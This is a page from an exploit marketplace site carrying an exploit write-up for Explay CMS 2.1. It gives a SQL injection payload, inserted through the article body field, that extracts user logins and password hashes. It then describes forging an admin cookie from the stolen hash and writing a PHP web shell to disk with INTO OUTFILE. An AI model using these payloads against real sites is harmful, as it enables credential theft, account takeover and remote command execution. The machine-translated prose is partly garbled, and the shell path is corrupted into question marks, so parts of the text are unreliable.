[ home ]  [ private ]  [ 0Day ]  [ discount ]  [ Get Gold ]  [ platforms ]  [ pentest ]  [ search ]  [ faq ]  [ contact ]  [ style ]  [ Prices in Gold ]   db: 39 380    
0day Today Exploit DB Official Facebook
0day Today Exploit DB Official Twitter
0day Today Exploit DB Official RSS Channel
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - Biggest Exploit Database in the World.
Select your language:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
Things you should know about 0day.today:
  • We use one main domain: http://0day.today
  • Most of the materials is completely FREE
  • If you want to purchase the exploit / get V.I.P. access or pay for any other service,
    you need to buy or earn GOLD
We accept currencies: [contact admin to find more]
           
We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
I am registered user of 0day.today. I don't want to see this screen in future.
What to do first?
  1. Read the [ agreement ]
  2. Read the [ Submit ] rules
  3. Visit the [ faq ] page
  4. [ Register ] profile
  5. Get [ GOLD ]
  6. If you want to [ sell ]
  7. If you want to [ buy ]
  8. If you lost [ Account ]
  9. Any questions [ admin@0day.today ]


Main links


You can contact us by

Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day Today Exploits Market and 0day Exploits Database

Explay CMS <= 2.1 SQL Injection Vulnerabilities

Author
0day Today Team
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11133
Category
web applications
Date add
01-03-2010
Platform
unsorted
===============================================
Explay CMS <= 2.1 SQL Injection Vulnerabilities
===============================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com


The vulnerability makes it possible to obtain the password hash of any user.
Exploitation of the vulnerability can be disabled when PHP-directive magic_quotes_gpc.

To obtain the password you want to add an article (http:// [explay] / my_articles / add /) with a code specially formed SQL-query in the box art_body (ie the main text of the article).

Code adding new articles:
modules / articles / mysql.class.php

PHP code :


public function add_article ($art) {
        $this->db->query ("INSERT INTO ".DB_PEREFIX."_articles VALUES (
                        0,
                        '".$art['art_category']."',
                        '".$art['art_header']."',
                        '".$art['art_body']."',
                        '".User::$properties['user_id']."',
                        '".time()."',
                        '".$art['art_comments']."',
                        '',
                        '',
                        '".$art['art_publik']."',
                        'no',
                        '".$art['art_visible']."',
                        '".$art['art_tags']."',
                        '0',
                        '',
                        '0',
                        '".$art['auto_tag']."'
        )");


 
Represents poisonous "text" article:

PHP code:

 aaaaa',  
(SELECT user_id FROM expl_users WHERE user_login='<UR_LOGIN>'),  
'1228445451',  
'on',  
'',  
'',  
'yes',  
'no',  
'on',  
(SELECT concat_ws(0x3a, user_login, user_password) FROM expl_users WHERE user_login='<USER'S_LOGIN>'),
'0',  
'',  
'0',  
'yes' )/*


Subqueries :

(SELECT user_id FROM expl_users WHERE user_login='<UR_LOGIN>')


want to become just added on our behalf (so how do you know your user_id prevents engine)

As a result, execute such a query:

PHP code:

 INSERT INTO expl_articles VALUES ( 0,  
'',  
'some_title',  
'aaaaa',  
(SELECT user_id FROM expl_users WHERE user_login='<UR_LOGIN>'),  
'1228445451',  
'on',  
'',  
'',  
'yes',  
'no',  
'on',  
(SELECT concat_ws(0x3a, user_login, user_password) FROM expl_users WHERE user_login='<USER'S_LOGIN>'),
'0',  
'',  
'0',  
'yes )



The result of the nested query in the form of "login: password" in the tags, such as:

admin:012ce7449da5b5afb89db5f32810946ea94098e6

 
There is however one subtlety. Passwords are encrypted by different algorithms:

PHP code:

 function expl_hash($str) {
    if (function_exists('sha1'))
        return sha1($str);  
    elseif (function_exists('mhash'))
        return bin2hex(mhash(MHASH_SHA1, $str));
    else
        return md5($str);
}


 
Type hash lekgo determine the length of the line. (MD5 - 32 bytes, SHA1 - 40 bytes).

To the great happiness, engine user authentication is implemented through Cookies, so that we can not Brutus hash,
and just create a cookie with the login and pass the appropriate values. Now we are admin.

 
Getting shell
But that's not all! Built-in admin interface to perform arbitrary SQL-queries allows us to create a shell (if included file_priv):

PHP code:

SELECT '<?php system($_GET["cmd"]) ?>' INTO OUTFILE '????_?_??????/shell.php'

 
Here, we must obtain your own user_id, as it should indicate if the box so that we have been the author of the article.
You can of course not specify "WHERE user_login = '<UR_LOGIN>'" and to write such a unit (user_id = 1), but then the author would himself admin =).
<UR_LOGIN> - Our name (not to be confused with the name!).



#  0day.today [2024-05-12]  #
0day Today Exploit Database buy and sell exploits type (local, remote, DoS, PoC, etc.)
Send all submissions to mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team